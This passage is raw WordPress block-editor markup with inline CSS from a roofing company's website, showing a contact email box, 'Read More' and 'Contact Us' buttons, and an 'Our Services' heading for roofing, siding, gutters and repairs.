1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/about/\",\"target\":false,\"counterId\":\"9c9da01d-f799-4178-ae4b-9714df123864\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/about/\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30f90495-ee55-4579-800d-d587d050d2fa\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-30f90495-ee55-4579-800d-d587d050d2fa background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e581b9d6-7409-4b90-bcaf-3c205e32317a\"} -->\n<style type=\"text/css\"> .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e581b9d6-7409-4b90-bcaf-3c205e32317a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\"} -->\n<style type=\"text/css\"> .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"953dcb7c-b238-4718-b90a-88d1da2d4246\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-953dcb7c-b238-4718-b90a-88d1da2d4246\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"3ad3deef-c09c-435f-9bef-60608e900e64\"} -->\n<style type=\"text/css\"> .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3ad3deef-c09c-435f-9bef-60608e900e64\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"93c9f688-c757-4040-a3f6-7eb370a7507b\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"61ff780f-af32-46b2-9e22-40df4790a340\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-61ff780f-af32-46b2-9e22-40df4790a340 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n 